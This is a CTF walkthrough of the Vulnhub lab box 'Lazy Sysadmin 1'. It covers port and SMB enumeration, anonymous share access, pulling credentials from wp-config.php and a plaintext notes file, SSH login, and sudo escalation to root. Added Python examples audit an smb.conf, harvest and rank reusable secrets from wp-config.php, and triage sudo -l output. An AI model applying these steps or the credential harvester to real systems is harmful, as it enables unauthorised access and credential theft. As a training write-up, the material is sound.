Lazy Sysadmin 1 – Vulnhub

One of the boxes that started me on my journey into CTFs. Strictly a beginner's box, this one can be done without any intermediate techniques such as reverse shells. The box can be found on Vulnhub. Let's get started.

Enumeration

nmap -n -sC -sV -p- -oA initial-nmap 192.168.56.101 
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-27 20:19 CEST
Nmap scan report for 192.168.56.101
Host is up (0.00012s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
| 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
| 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_ 256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries 
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd
| irc-info: 
| server: Admin.local
| users: 1
| servers: 1
| chans: 0
| lusers: 1
| lservers: 0
| source ident: nmap
| source host: 192.168.56.102
|_ error: Closing link: (nmap@192.168.56.102) [Client exited]
MAC Address: 08:00:27:0D:C3:62 (Oracle VirtualBox virtual NIC)
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1h20m00s, deviation: 5h46m24s, median: 1h59m58s
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: lazysysadmin
| NetBIOS computer name: LAZYSYSADMIN\x00
| Domain name: \x00
| FQDN: lazysysadmin
|_ System time: 2018-06-28T06:19:52+10:00
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2018-06-27 22:19:52
|_ start_date: N/A

That's a lot of services. To sum it up:

  • 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
  • 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
  • 139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
  • 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu
  • 3306/tcp open mysql MySQL (unauthorized)
  • 6667/tcp open irc InspIRCd

gobuster -u 192.168.56.101 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100 -x .html,.pdf,.txt,.cgi,.php

Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.56.101/
[+] Threads : 100
[+] Wordlist : /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes : 307,200,204,301,302
[+] Extensions : .html,.pdf,.txt,.cgi,.php
=====================================================
/index.html (Status: 200)
/info.php (Status: 200)
/wordpress (Status: 301)
/test (Status: 301)
/wp (Status: 301)
/apache (Status: 301)
/old (Status: 301)
/javascript (Status: 301)
/robots.txt (Status: 200)
/phpmyadmin (Status: 301)

==================================================

Visiting the /wordpress URL shows the site tagline "My name is togie", which gives us a candidate username: togie.

Let's run enum4linux to get some info on the box.

enum4linux 192.168.56.101
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jun 27 21:02:37 2018

==========================
| Target Information |
==========================
Target ........... 192.168.56.101
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

======================================================
| Enumerating Workgroup/Domain on 192.168.56.101 |
======================================================
[+] Got domain/workgroup name: WORKGROUP

==============================================
| Nbtstat Information for 192.168.56.101 |
==============================================
Looking up status of 192.168.56.101
LAZYSYSADMIN <00> - B <ACTIVE> Workstation Service
LAZYSYSADMIN <03> - B <ACTIVE> Messenger Service
LAZYSYSADMIN <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections

MAC Address = 00-00-00-00-00-00

=======================================
| Session Check on 192.168.56.101 |
=======================================
[+] Server 192.168.56.101 allows sessions using username '', password ''

=============================================
| Getting domain SID for 192.168.56.101 |
=============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

========================================
| OS information on 192.168.56.101 |
========================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.56.101 from smbclient:
[+] Got OS info for 192.168.56.101 from srvinfo:
LAZYSYSADMIN Wk Sv PrQ Unx NT SNT Web server
platform_id : 500
os version : 6.1
server type : 0x809a03

===============================
| Users on 192.168.56.101 |
===============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

===========================================
| Share Enumeration on 192.168.56.101 |
===========================================
WARNING: The "syslog" option is deprecated

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
share$ Disk Sumshare
IPC$ IPC IPC Service (Web server)
Reconnecting with SMB1 for workgroup listing.

Server Comment
--------- -------

Workgroup Master
--------- -------
WORKGROUP LAZYSYSADMIN

[+] Attempting to map shares on 192.168.56.101
//192.168.56.101/print$ Mapping: DENIED, Listing: N/A
//192.168.56.101/share$ Mapping: OK, Listing: OK
//192.168.56.101/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

======================================================
| Password Policy Information for 192.168.56.101 |
======================================================

[+] Attaching to 192.168.56.101 using a NULL share

[+] Trying protocol 445/SMB...

[+] Found domain(s):

[+] LAZYSYSADMIN
[+] Builtin

[+] Password Info for Domain: LAZYSYSADMIN

[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0

[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5

================================
| Groups on 192.168.56.101 |
================================

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

=========================================================================
| Users on 192.168.56.101 via RID cycling (RIDS: 500-550,1000-1050) |
=========================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\togie (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

We see here that there is a local user called 'togie' (matching the name on /wordpress) and that the share$ share can be mapped and listed over a null session, i.e. with an empty username and password. Also worth noting from the password policy: minimum length 5, complexity disabled and no lockout threshold, at least for Samba accounts, so weak passwords are likely and guessing them would not lock anything out. Let's see if we can exploit this.
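
What makes share$ listable without credentials is a Samba configuration problem, not an exploit. The box's real smb.conf is never shown in this walkthrough, so the following is an added example rather than anything from the box: a constructed smb.conf that reproduces what nmap and enum4linux reported (a guest-accessible share, signing not required), a hardened version of the same share, and a small audit function that flags the differences. The share path /var/www/html, the `valid users = togie` line and the hardened path are assumptions.

```python
"""Audit an smb.conf for the misconfiguration that exposed share$.

Added example for this walkthrough. The box's real smb.conf is not shown, so
WEAK_SMB_CONF below is a constructed reconstruction of a config that produces
what nmap and enum4linux reported: a share that accepts a null session and
SMB signing that is not required.
"""
import configparser

# Constructed: reproduces the observed behaviour (share$ "Sumshare", guest access).
WEAK_SMB_CONF = """\
[global]
workgroup = WORKGROUP
server string = Web server
map to guest = Bad User
server signing = auto

[share$]
comment = Sumshare
path = /var/www/html
browseable = yes
guest ok = yes
read only = yes
"""

# Constructed: the same share once the todolist.txt item has actually been done.
HARDENED_SMB_CONF = """\
[global]
workgroup = WORKGROUP
server string = Web server
map to guest = Never
restrict anonymous = 2
server signing = mandatory

[share$]
comment = Sumshare
path = /srv/samba/share
browseable = no
guest ok = no
valid users = togie
read only = yes
"""

# Directories that should never be exported to anonymous SMB clients (assumed list).
WEB_ROOTS = ("/var/www", "/srv/www", "/usr/share/nginx/html")


def _yes(section, key, default="no"):
    """Samba booleans accept yes/no, true/false, 1/0, on/off, case-insensitively."""
    return section.get(key, default).strip().lower() in ("yes", "true", "1", "on")


def _under(path, root):
    path = path.rstrip("/")
    return path == root or path.startswith(root + "/")


def audit_smb_conf(text):
    """Return a list of (section, problem) tuples; an empty list means no findings."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)  # smb.conf is ini-shaped; keys are case-insensitive
    findings = []

    g = cp["global"] if cp.has_section("global") else {}
    map_to_guest = g.get("map to guest", "never").strip().lower()  # Samba default: Never
    if map_to_guest != "never":
        findings.append(("global", f"map to guest = {map_to_guest}: anonymous or failed logins become the guest account"))
    if int(g.get("restrict anonymous", "0")) < 2:  # Samba default: 0
        findings.append(("global", "restrict anonymous < 2: null sessions are accepted"))
    signing = g.get("server signing", "default").strip().lower()
    if signing not in ("mandatory", "required"):
        findings.append(("global", f"server signing = {signing}: not required (nmap: message signing disabled)"))

    for name in cp.sections():
        if name.lower() in ("global", "printers"):
            continue
        s = cp[name]
        path = s.get("path", "").strip()
        guest = _yes(s, "guest ok") or _yes(s, "public")  # 'public' is a synonym
        if guest:
            findings.append((name, "guest ok = yes: readable without credentials"))
        if any(_under(path, r) for r in WEB_ROOTS):
            findings.append((name, f"path = {path}: exports the web root (wp-config.php, backups, test dirs)"))
        writable = _yes(s, "writable") or _yes(s, "writeable") or not _yes(s, "read only", "yes")
        if guest and writable:
            findings.append((name, "guest-writable share: anonymous users can drop files"))
    return findings


if __name__ == "__main__":
    for section, problem in audit_smb_conf(WEAK_SMB_CONF):
        print(f"[{section}] {problem}")
    print("hardened:", audit_smb_conf(HARDENED_SMB_CONF))
```

The checks map directly onto the nmap and enum4linux output above: `message_signing: disabled` is the `server signing` line, and "Mapping: OK, Listing: OK" with an empty username is the `guest ok` plus `map to guest` combination. `restrict anonymous = 2` is the belt-and-braces setting for the IPC$ null session enum4linux used for RID cycling.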

Exploitation

We can use smbclient to access this share. When it asks for a password, just press Enter (smbclient's -N flag skips the prompt and does the same).

smbclient //192.168.56.101/share$
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Aug 15 13:05:52 2017
.. D 0 Mon Aug 14 14:34:47 2017
wordpress D 0 Tue Aug 15 13:21:08 2017
Backnode_files D 0 Mon Aug 14 14:08:26 2017
wp D 0 Tue Aug 15 12:51:23 2017
deets.txt N 139 Mon Aug 14 14:20:05 2017
robots.txt N 92 Mon Aug 14 14:36:14 2017
todolist.txt N 79 Mon Aug 14 14:39:56 2017
apache D 0 Mon Aug 14 14:35:19 2017
index.html N 36072 Sun Aug 6 07:02:15 2017
info.php N 20 Tue Aug 15 12:55:19 2017
test D 0 Mon Aug 14 14:35:10 2017
old D 0 Mon Aug 14 14:35:13 2017

Sweet! We have access to the web root. Let's use the 'get' command to download deets.txt, todolist.txt and the wp-config.php from the /wordpress directory. I always get the wp-config.php, since it often contains the MySQL password:

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'Admin');

/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');

/** MySQL hostname */
define('DB_HOST', 'localhost');
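
Pulling credentials out of a wp-config.php by eye is fine for one file, but on a box with /wordpress, /wp, /old and /test you quickly want something repeatable. The following is an added example, not the author's code: it parses the define() constants and the table prefix out of a wp-config.php and returns the database credentials plus any secret worth trying elsewhere. The sample input is constructed from the excerpt above with a few extra lines a real file carries (a double-quoted value with escapes, a placeholder salt, the table prefix); the extra values are made up.

```python
"""Harvest credentials from a wp-config.php pulled off a share or web root.

Added example for this walkthrough, not the author's code. It goes a little
beyond the excerpt above: single- and double-quoted define() calls, PHP string
escapes, $table_prefix, and skipping WordPress' placeholder salts.
"""
import re

# Constructed sample: the walkthrough's excerpt plus invented extra lines.
WP_CONFIG = r"""<?php
// ** MySQL settings - You can get this info from your web host ** //
define('DB_NAME', 'wordpress');
define('DB_USER', 'Admin');
define('DB_PASSWORD', 'TogieMYSQL12345^^');
define('DB_HOST', 'localhost');
define("DB_CHARSET", "utf8");
define('AUTH_KEY', 'put your unique phrase here');
define("SECURE_AUTH_KEY", "x7\"y\\z$1");
$table_prefix = 'wp_';
"""

PLACEHOLDER = "put your unique phrase here"  # what a fresh wp-config-sample.php ships with

# define('NAME', 'value') in either quote style; the value may contain escaped quotes.
_DEFINE_RE = re.compile(
    r"""define\s*\(\s*(?P<q1>['"])(?P<name>[A-Za-z_]\w*)(?P=q1)\s*,\s*"""
    r"""(?P<q2>['"])(?P<value>(?:\\.|(?!(?P=q2)).)*)(?P=q2)\s*\)""",
    re.DOTALL,
)
_PREFIX_RE = re.compile(r"""\$table_prefix\s*=\s*(['"])(.*?)\1\s*;""")
_DQ_ESCAPES = {"n": "\n", "t": "\t", "r": "\r", "$": "$", '"': '"', "\\": "\\"}


def _php_unescape(raw, quote):
    """Undo PHP escaping: '...' only knows \\' and \\\\, "..." knows a few more.
    Unknown escapes keep their backslash, as PHP does."""
    if quote == "'":
        return re.sub(r"\\(['\\])", lambda m: m.group(1), raw)
    return re.sub(r"\\(.)", lambda m: _DQ_ESCAPES.get(m.group(1), m.group(0)), raw, flags=re.DOTALL)


def parse_wp_config(text):
    """Every define()d constant plus $table_prefix, as a dict in file order."""
    consts = {
        m.group("name"): _php_unescape(m.group("value"), m.group("q2"))
        for m in _DEFINE_RE.finditer(text)
    }
    pm = _PREFIX_RE.search(text)
    if pm:
        consts["table_prefix"] = pm.group(2)
    return consts


def db_credentials(text):
    """The MySQL connection details, the reason wp-config.php is always worth grabbing."""
    c = parse_wp_config(text)
    return {
        "user": c.get("DB_USER"),
        "password": c.get("DB_PASSWORD"),
        "host": c.get("DB_HOST", "localhost"),
        "database": c.get("DB_NAME"),
    }


def reusable_secrets(text):
    """Values worth trying against other services (SSH, phpMyAdmin, MySQL):
    the DB password and any real, non-placeholder salt. Deduplicated, file order."""
    out = []
    for name, value in parse_wp_config(text).items():
        if name == "DB_PASSWORD" or name.endswith(("_KEY", "_SALT")):
            if value and value != PLACEHOLDER and value not in out:
                out.append(value)
    return out


if __name__ == "__main__":
    print(db_credentials(WP_CONFIG))
    print(reusable_secrets(WP_CONFIG))
```

Salts are included because on some boxes the admin reuses one as a password; the placeholder text is skipped so a fresh install does not produce noise.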

I tried the password on the /phpmyadmin page, but it seems like a rabbit hole. Let's view the .txt files we pulled earlier. Todolist.txt says:

 Prevent users from being able to view to web root using the local file browser

Deets.txt says:

CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

Damn, what a lazy admin indeed. So now we have a username (togie) and a password (12345). Let's see if this allows us to log in to the SSH service:

ssh 192.168.56.101 -l togie
##################################################################################################
# Welcome to Web_TR1 #
# All connections are monitored and recorded #
# Disconnect IMMEDIATELY if you are not an authorized user! #
##################################################################################################

togie@192.168.56.101's password:
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

* Documentation: https://help.ubuntu.com/

System information disabled due to load higher than 1.0

133 packages can be updated.
0 updates are security updates.

togie@LazySysAdmin:~$

Privilege Escalation

Let's see what sudo allows us to do:

sudo -l
[sudo] password for togie:
Matching Defaults entries for togie on LazySysAdmin:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User togie may run the following commands on LazySysAdmin:

(ALL : ALL) ALL
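
The (ALL : ALL) ALL line is what a sudoers entry of the form `togie ALL=(ALL:ALL) ALL` renders as: any command, as any user and any group, with a password (no NOPASSWD tag, hence the prompt above). As an added example that is not part of the walkthrough, here is a small parser that turns `sudo -l` output into structured rules and ranks them. It is run over the output above and over a constructed second output from a hypothetical host with a restricted NOPASSWD rule, the shape you see far more often than a blanket ALL.

```python
"""Parse and rank `sudo -l` output.

Added example for this walkthrough, not the author's code. The first sample is
the output shown above; the second is constructed to exercise tags and
multi-command rules on a made-up host.
"""
import re

SUDO_L_LAZYSYSADMIN = """\
Matching Defaults entries for togie on LazySysAdmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User togie may run the following commands on LazySysAdmin:
    (ALL : ALL) ALL
"""

# Constructed: hypothetical host with narrower rules.
SUDO_L_OTHER = """\
User alice may run the following commands on otherhost:
    (root) NOPASSWD: /usr/bin/vim, /bin/cat /var/log/syslog
    (www-data) /usr/bin/systemctl restart apache2
"""

# "(runas_user : runas_group) TAG: command, command" as sudo -l prints it.
_RULE_RE = re.compile(r"^\s*\((?P<user>[^:)]+?)(?:\s*:\s*(?P<group>[^)]+?))?\)\s*(?P<rest>.+)$")
_TAG_RE = re.compile(r"([A-Z_]+):\s*")
_TAGS = {
    "NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV", "LOG_INPUT",
    "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT", "MAIL", "NOMAIL", "FOLLOW", "NOFOLLOW",
}


def parse_sudo_l(text):
    """One dict per rule found after the 'may run the following commands' line."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = _RULE_RE.match(line)
        if not m:
            continue  # Defaults lines or continuations are not modelled here
        rest = m.group("rest").strip()
        tags = []
        while True:  # peel leading tags such as NOPASSWD: or SETENV:
            tm = _TAG_RE.match(rest)
            if not tm or tm.group(1) not in _TAGS:
                break
            tags.append(tm.group(1))
            rest = rest[tm.end():]
        rules.append({
            "runas_user": m.group("user").strip(),
            "runas_group": (m.group("group") or "").strip() or None,
            "tags": tags,
            "commands": [c.strip() for c in rest.split(", ") if c.strip()],
        })
    return rules


def classify(rule):
    """full_root: any command as root/ALL (game over). root_restricted: named
    commands as root (check each against GTFOBins). other_user: lateral move only."""
    as_root = rule["runas_user"] in ("ALL", "root")
    if as_root and "ALL" in rule["commands"]:
        return "full_root"
    return "root_restricted" if as_root else "other_user"


def triage(text):
    """(rank, passwordless, commands) per rule, most dangerous first."""
    order = {"full_root": 0, "root_restricted": 1, "other_user": 2}
    rows = [(classify(r), "NOPASSWD" in r["tags"], r["commands"]) for r in parse_sudo_l(text)]
    return sorted(rows, key=lambda row: (order[row[0]], not row[1]))


if __name__ == "__main__":
    for sample in (SUDO_L_LAZYSYSADMIN, SUDO_L_OTHER):
        for rank, nopasswd, commands in triage(sample):
            print(f"{rank:16} nopasswd={nopasswd!s:5} {', '.join(commands)}")
```

The ranking is deliberately coarse: a blanket ALL needs no further thought, while a restricted list is where the real work (looking each binary up for a shell escape) starts.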

Well, that looks like game, set and match: (ALL : ALL) ALL means togie can run any command as any user and group, so a plain sudo su gives a root shell:

togie@LazySysAdmin:~$ sudo su
root@LazySysAdmin:/home/togie# cd /root/
root@LazySysAdmin:~# ls
proof.txt 

Really enjoyed this box. Quite easy and really helpful in learning the initial skills for CTFs!